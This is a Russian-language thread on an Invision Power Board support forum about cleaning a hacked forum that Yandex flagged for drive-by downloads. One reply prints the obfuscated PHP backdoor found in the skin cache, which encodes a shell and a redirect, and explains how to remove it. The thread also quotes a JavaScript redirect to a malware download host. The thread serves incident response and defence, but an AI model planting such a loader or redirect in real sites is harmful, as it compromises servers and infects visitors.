Яндекс обнаружил вредоносный код на форуме - Дизайн и модификация Invision Power Board

Перейти к содержимому

 

Правила раздела

Здесь обсуждаются вопросы по настройке и администрированию форумов IPB 3.x.
Пожалуйста, не оффтопьте, если зашли сюда случайно, и обратите внимание на соседние разделы.
Установка, настройка и обслуживание форумов IPB 2.x.
Оформление форумов, включая верстку скинов.
Размещение рекламы на форумах.
SEO оптимизация форума.
Техническая поддержка наших скинов и модов.

СвернутьПрикрепленные теги

вирус ipb

  • 9 Страниц +
  • 1
  • 2
  • 3
  • Последняя »

Яндекс обнаружил вредоносный код на форуме

#1 Пользователь не на сайте   Karagor ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 64
  • Регистрация: 27-Июль 12
  • Репутация: 1
  • IPB version:3.4.x
 

Отправлено 02 Февраль 2015 - 00:29

Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом.

Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"
А именно:

Цитата

Поведенческий анализ

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.


Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно.

Написал вопрос в саппорт, ответ был следующим:

На Вашем сайте с помощью url: sport-horse.pro/index.php?ipbv=e13484a4543e54a53b72269a15c16faa&g=js периодически подгружается следующее вредоносное содержимое:

document.location='http://filestore321.com/download.php?id=6de46215' 


Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.
В общем я в тупике и не понимаю в какую сторону мне рыть.

Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.
Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел.

Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь.
0

#2 Пользователь на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 688
  • Регистрация: 20-Март 09
  • Репутация: 2 261
  • IPB version:3.1.x
 

Отправлено 02 Февраль 2015 - 01:14

В последнее время часто наблюдаю взломы подобного типа. Прямо на днях пришлось лечить один форум, а некоторые форумы тех поддержки так и сидят в серпе с этой заразой (привет товарищам с studio-klass.ru).
Есть предположение что связано это с последней найденной уязвимостью (sql-injection). Предположение основано на том, что там стояла версия 3.4.5 потом делалось обновление на 3.4.7 со всеми патчами безопасности, после чего обнаружился вирус.

Вредоносный код сидит в /cache/skin_cache/cache_%id/skin_global.php, метод includeJS и имеет подобный вид:

$pk='MD5 HASH';
$rsa='o/2`B3b2go0viFoy@FoBP:UJP#`82|JGar<sj#`zK:a}bz=D2]J8r#|v2r=DyAuU2EU(oA&(K*FU2r=Qb:kCr#|AyzJAyAyge*U5P:U@P#L/a}J`ysP/yses>9f(j[}(anT(y[=`F*uUr}%_Z}&bP,%!rEU(araTb*Tn;r=`=t&"a:|tb#&`K,=Dy`JAb[<LeAuUr}%_Z}&bP,%!rEU(KRgUFR}fy,P`a}JW;r&t2*usp#P/F,LGy:`UarP$;[PTF#L$y#L}ys%$o]k8a:|vp#Us>*&"ZD|E|U|E]AFp|k&<r}|R&|P"<ZFkR`<srEU5P:;J<,%Tys=`r[|Ab*uUr}=kZ`akZ`gsEk&ZZkJE&ZakZU|EP}D(jA&t_ZfUa`gs2:JGF*FFjA&A_Z%Qyz|sr#}TF:=@K*ytb:`#a|Q8;#JW":F/b#Fga|Q8",`T2:J/r*C$;z`8aACtb#}$o]k8a:|vr*CAFrLA;]}nb:|Ar*CAFrLn;]`UF|Q8":aT;#|nb#J!r*C$2]CGF:ksyzkWr*C$F:`8or|AbkQ8":P(FkQ8b,Ut2EygP:e(",QU;GDJP[<8;#$sjA&@_E&"ZD|E|U|E]AFp|k&<rDT_Z}<srRgU;tDUF:T(yAD6yT!Bv[Y6y#|DF:`8a[=bP#=/b#W(a|J(a*FFjA&s_E&n>nFGar=G2]J8r#`UPGgUaRDU;nvsb:k8a}J(a*y5P:<Ja]}QF,U@PkJR&|P]&|PbPDTZ|k%"]kJ=R}@srEU52];@a]}QF,U@PkJ9RDJ>EZ|bP:|FKE`52];@2r=Gar<@PkJ,&|&bP#`Q;s;srEUzPnuTa]}QF,U@PkJ,&|&bP#ysrEU(Pn;@p]|Wy,&CK*&"<DJ_ED`k]A&srEU(KrW(anuU;GDJP:u(o#`zK*&UKr=`F:=/b#W(aEuUaEQsa]vs>,&(b]Z@KEgG=tfQe*U5P:DJy[|ny[&AK:}U=EuU2*Uge*QvKRWQyz`8F*una:JtF]}`bs<8b:Jt;r&(b#vJP#TDF,f0>AJz2]L`y[&/yzZGet-8;#JW>#&/F#Cgb#kU>s%@y9J(a9}5P:}JPAp(j[}`o:`Dj[}(anu@pE&}KE;zP,p(oA&PZ-Pp|-}e>tDn_,=tyz`QF*%Dor%`_EFDarTD>#(TFzkG;[P(y,<sp,=A;GDsoA&D2:`G>RCGar&D2]Csy}gs;zJTyz&"FrPgP}}J>#`8a:|v>s%@y9J(y:P#_rgUF:T(yAD6yT!Bv[Y6yz|s2r=DysUW_zJ}F,%}F*D6yT!Bv[Y6;]CD2Z=T;#T`E:kG2,Dz;]}Qj#yJ2ses_tQ/y#=A2r%D_np5"rDYY.';
$pka='0}9J8<ie?.4m-/Vulk&bI7W+^E>X,GOM5L$`"|vnBTzc%*oFRA2s]@6tqaPUw3[dZ;~DQyfCp{=#jHgS(1rh:YN_)!Kx';
$pkb='61D9uQ_M&;`!Evqg,FRb$<t:/SL?Hz^*7x8lfV4i(hm}BCedTyanWo.j{ZJk#@3~UY"0wcA5I+N2O>s]p%X|G)-P=rK[';
$f='%t%'.substr($rsa,566,1);
$klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html');

Сигнатура обфусцированного кода может отличатся в разных случаях. Закадирован в нем шелл и редирект на filestore321.com/download.php?id={$m}.
Деятельность вируса палится по наличию куке lang_id eng после ридеректа на вредоносный сайт - заплатка для предотвращения повторного редиректа.
Проверить на взлом этим вирусом можно перейдя на форум из поисковых систем. Также можно проверить по адресу forum.ru/index.php?ipbv=hash&g=js, если откроется пустая страница значит форум заражен (при первом заходе на форум нужно два раза запросить этот адрес).

Основная суть лечения заключается в:
  • Проверка шаблона Глобальные -> includeJS в АЦ. Обновления кеша стилей для удаления вредасного кода из кеша.
  • Обновления форума до актуальной версии или обязательная установка всех патчей безопасности после выхода вашей версии
  • Смена паролей для:
    - всех (!) пользователей имеющих доступ в АЦ
    - базе данных
    - фтп
  • Добавления форума в Яндекс.Вебмастер'е с отправкой запроса на перепроверку в разделе Безопасность (это ускорит повторную проверку форума). Проверка, как правило, длится несколько дней.

Но это не дает гарантий что злоумышленик не оставил шеллы где-то еще в других файлах. Для полного лечения нужно просканировать весь форум специальным сканером шеллов, либо искать вручную вредоносные сигнатуры и функции которые чаще всего используются для составления закладок - eval, assert, base64_decode, preg_replace, etc и анализировать их на предмет вредоносности. Популярным для этих целей является скрипт ai-bolit - www.revisium.com/ai/. Хотя работает он жутко медленно и сканрует все подряд, ранние его версии мне больше нравились.
9

#3 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 141
  • Регистрация: 13-Апрель 12
  • Репутация: 326
  • Откуда:no
  • IPB version:1.x
 

Отправлено 02 Февраль 2015 - 09:59

Дополню, яндекс сейчас очень усердно помечает форумы, как зараженные и тд. (А всё дело, во внешних ссылках в постах, которые ведут на хостинги картинок и тд). Обычно, при посещении конкретной ветки он орал, страница заражена, а сейчас весь сайт.
2

#4 Пользователь не на сайте   Karagor ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 64
  • Регистрация: 27-Июль 12
  • Репутация: 1
  • IPB version:3.4.x
 

Отправлено 02 Февраль 2015 - 10:35

Ох, спасибо.
Видимо предстоит нешуточный геморрой (((

Буду пробовать.
0

#5 Пользователь не на сайте   Karagor ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 64
  • Регистрация: 27-Июль 12
  • Репутация: 1
  • IPB version:3.4.x
 

Отправлено 02 Февраль 2015 - 13:37

Странно, патч не грузится почему-то, хоть я и залогинен под логином с которого покупал форум. Может они еще что-то нашли и делают новый?
0

#6 Пользователь не на сайте   newbie ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 166
  • Регистрация: 26-Октябрь 11
  • Репутация: 814
  • IPB version:I have no IPB
 

Отправлено 02 Февраль 2015 - 13:45

Просмотреть сообщениеKaragor сказал(а):

Странно, патч не грузится почему-то, хоть я и залогинен под логином с которого покупал форум. Может они еще что-то нашли и делают новый?

http://ipbskins.ru/f...dpost__p__88545
Ниже еще найдете ссылку на последний патч
1

#7 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 141
  • Регистрация: 13-Апрель 12
  • Репутация: 326
  • Откуда:no
  • IPB version:1.x
 

Отправлено 02 Февраль 2015 - 13:45

http://forums.ibreso...ecurity-update/
0

#8 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 141
  • Регистрация: 13-Апрель 12
  • Репутация: 326
  • Откуда:no
  • IPB version:1.x
 

Отправлено 02 Февраль 2015 - 13:53

Просмотреть сообщениеАтаман 02 Февраль 2015 - 09:59 сказал(а):

Дополню, яндекс сейчас очень усердно помечает форумы, как зараженные и тд. (А всё дело, во внешних ссылках в постах, которые ведут на хостинги картинок и тд). Обычно, при посещении конкретной ветки он орал, страница заражена, а сейчас весь сайт.


И все зараженные страницы видно в веб мастере.
0

#9 Пользователь на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 688
  • Регистрация: 20-Март 09
  • Репутация: 2 261
  • IPB version:3.1.x
 

Отправлено 02 Февраль 2015 - 15:03

Просмотреть сообщениеАтаман сказал(а):

А всё дело, во внешних ссылках в постах, которые ведут на хостинги картинок и тд

У яндекса конечно бывают глюки, особенно на всякие скрипты контекстной рекламы (учитывая последний фейл google adwords'а откуда долгое время лился трафик на вирусные сайта) и картинок с зараженных сайтов, но в свете последней волны взломов я бы всетаки тщательно проверил форум на взлом.
1

#10 Пользователь не на сайте   Karagor ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 64
  • Регистрация: 27-Июль 12
  • Репутация: 1
  • IPB version:3.4.x
 

Отправлено 02 Февраль 2015 - 23:55

Отчитываюсь:

1. Патч поставил
2. Обновил кеш стилей
3. Поменял все пароли

На данный момент по запросу sport-horse.pro/index.php?ipbv=hash&g=js вместо пустой страницы выдается страница сайта.
Послал в яндекс запрос на перепроверку сайта.

Жду )
0

#11 Пользователь не на сайте   Karagor ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 64
  • Регистрация: 27-Июль 12
  • Репутация: 1
  • IPB version:3.4.x
 

Отправлено 02 Февраль 2015 - 23:57

Да, попытался запустить скрипт айболит, но что-то он вылетает в 504 Gateway Time-out.
Почитал у них на сайте ФАК, пошел запускать через SSH

Запустил, ждем-с 55к файлов...
0

#12 Пользователь на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 688
  • Регистрация: 20-Март 09
  • Репутация: 2 261
  • IPB version:3.1.x
 

Отправлено 03 Февраль 2015 - 00:01

По поводу патчей. Желательно ставить не один конкретный, а все имеющиеся. В каждом из них закрыта какая-то уязвимость, какие-то более критические, какие-то нет. А лучше всего обновится до последней версии. Была бы английская версия, можно было скачать пропатченный дистрибутив из клиентцентра.
0

#13 Пользователь на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 688
  • Регистрация: 20-Март 09
  • Репутация: 2 261
  • IPB version:3.1.x
 

Отправлено 03 Февраль 2015 - 00:02

Просмотреть сообщениеKaragor сказал(а):

Да, попытался запустить скрипт айболит, но что-то он вылетает в 504 Gateway Time-out.

Из браузера даже не стоит пытаться. Только из ssh. Скрипт нужно сконфигурировать чтобы сканировал только php файлы.
0

#14 Пользователь не на сайте   Karagor ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 64
  • Регистрация: 27-Июль 12
  • Репутация: 1
  • IPB version:3.4.x
 

Отправлено 03 Февраль 2015 - 00:51

На данный момент кончилась лицензия, а по новому курсу платить за продление пока не решаюсь.

А патчи не накопительные разве?
Но я вообще-то ставил все, кроме последнего.
0

#15 Пользователь на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 688
  • Регистрация: 20-Март 09
  • Репутация: 2 261
  • IPB version:3.1.x
 

Отправлено 03 Февраль 2015 - 00:58

Просмотреть сообщениеKaragor сказал(а):

А патчи не накопительные разве?

Накопительные - это версии. А патчи устраняют найденную в определенный момент времени конкретную проблему.
0

Сообщить об этой теме:


  • 9 Страниц +
  • 1
  • 2
  • 3
  • Последняя »


Быстрый ответ

  

1 пользователей читают эту тему
0 зарегистрированных, 1 гостей, 0 скрытых


Контактная информация

Вопросы по работе сайта

+7 (917) 501-4765
C 10 до 20 в рабочие дни (время московское)

Техническая поддержка

Контактные данные специалистов

Дизайн форумов

IPB 3.x ¦ IPB 2.x

Бесплатные шаблоны

IPB 3.2 – 3.4 ¦ IPB 3.1 ¦ IPB 3.0 ¦ IPB 2.2 – 2.3 ¦ IPB 2.1 ¦ Клипарт
Лицензия на использование ¦ Ваша поддержка ¦ О проекте
Copyright © 2005-2016 IPBSkins.ru Team
При копировании материалов с сайта
прямая ссылка на источник обязательна